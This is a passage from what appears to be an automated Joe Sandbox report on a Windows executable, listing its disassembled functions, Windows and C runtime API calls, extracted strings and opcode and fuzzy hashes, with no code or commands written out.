                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write
                • String ID: A
                • API String ID: 3115901604-2078354741
                • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                • Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
                • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                • Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 79e553d7807a71c31d5f565a6ca679b64bdd2cc97f395ffbc82dd2b658a72be3
                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                • Opcode Fuzzy Hash: 79e553d7807a71c31d5f565a6ca679b64bdd2cc97f395ffbc82dd2b658a72be3
                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$C7F
                • API String ID: 2102423945-2013712220
                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                APIs
                • UuidCreate.RPCRT4(?), ref: 0040C5DA
                • UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
                • RpcStringFreeA.RPCRT4(00000000), ref: 0040C640
                Strings
                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: StringUuid$CreateFree
                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                • API String ID: 3044360575-2335240114
                • Opcode ID: bdba235617e576317071dbdcb3c7f0f635bbb3b946519964353194869aba474c
                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                • Opcode Fuzzy Hash: bdba235617e576317071dbdcb3c7f0f635bbb3b946519964353194869aba474c
                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcscmp
                • String ID: ACP$OCP
                • API String ID: 856254489-711371036
                • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                • Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                APIs
                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ClassCursorLoadRegister
                • String ID: 0$LPCWSTRszWindowClass
                • API String ID: 1693014935-1496217519
                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendDeleteFileFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 610490371-2616962270
                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove_strtok
                • String ID:
                • API String ID: 3446180046-0
                • Opcode ID: c00f777057cfc497f6ad005c04cc735c1c0148d3cbba073175e6a02dfb1863fe
                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                • Opcode Fuzzy Hash: c00f777057cfc497f6ad005c04cc735c1c0148d3cbba073175e6a02dfb1863fe
                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: f1e55ddf1b48320da422e8d24451972b863506930d60daf63cc4f741a3860e6f
                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                • Opcode Fuzzy Hash: f1e55ddf1b48320da422e8d24451972b863506930d60daf63cc4f741a3860e6f
                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 17e48d2795cb0a26b32502bf9f9c6cd4e969bd77cc15fecae0c63f2ffe2a3f24
                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                • Opcode Fuzzy Hash: 17e48d2795cb0a26b32502bf9f9c6cd4e969bd77cc15fecae0c63f2ffe2a3f24
                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                APIs
                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                • CallCatchBlock.LIBCMT ref: 004C70F8
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                APIs
                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                • __calloc_crt.LIBCMT ref: 00425A01
                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                • __lock.LIBCMT ref: 00425A37
                • ___addlocaleref.LIBCMT ref: 00425A43
                • __lock.LIBCMT ref: 00425A57
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                • String ID:
                • API String ID: 2580527540-0
                • Opcode ID: da4dd83d0a7bbd407258e1c08e6412638ccc8f45690559412b66f785422cb9d5
                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                • Opcode Fuzzy Hash: da4dd83d0a7bbd407258e1c08e6412638ccc8f45690559412b66f785422cb9d5
                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                APIs
                • lstrlenW.KERNEL32 ref: 004127B9
                • _malloc.LIBCMT ref: 004127C3
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                • _memset.LIBCMT ref: 004127CE
                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                APIs
                • lstrlenA.KERNEL32 ref: 00412806
                • _malloc.LIBCMT ref: 00412814
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                • _memset.LIBCMT ref: 0041281F
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: c3bd0c51cb779beeb0a9775a21199764848d1e51d0c53401b1542843ed6001c9
                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                • Opcode Fuzzy Hash: c3bd0c51cb779beeb0a9775a21199764848d1e51d0c53401b1542843ed6001c9
                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\asn1\tasn_new.c
                • API String ID: 2102423945-2878120539
                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: e0fa685548146d3dd02f1ec3174b9dc710b3be84cbb919d47e0838b50276ea31
                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                • Opcode Fuzzy Hash: e0fa685548146d3dd02f1ec3174b9dc710b3be84cbb919d47e0838b50276ea31
                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .\crypto\err\err.c$unknown
                • API String ID: 0-565200744
                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8Q
                • API String ID: 3761405300-2096853525
                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
